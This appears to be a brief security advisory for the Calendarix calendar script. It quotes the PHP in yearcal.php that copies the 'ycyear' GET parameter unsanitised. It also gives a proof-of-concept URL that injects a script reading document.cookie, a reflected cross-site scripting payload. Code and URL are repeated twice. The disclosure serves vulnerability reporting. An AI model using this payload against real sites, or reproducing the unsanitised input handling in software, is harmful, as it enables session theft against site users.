botan@linuxmail.org
17/04/06, 19:00
Website : http://www.calendarix.com
Vulnerable :
if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];
http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>
Vulnerable :
if (!isset($_GET['ycyear']))
$ycyear = $y ;
else
$ycyear = $_GET['ycyear'];
http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>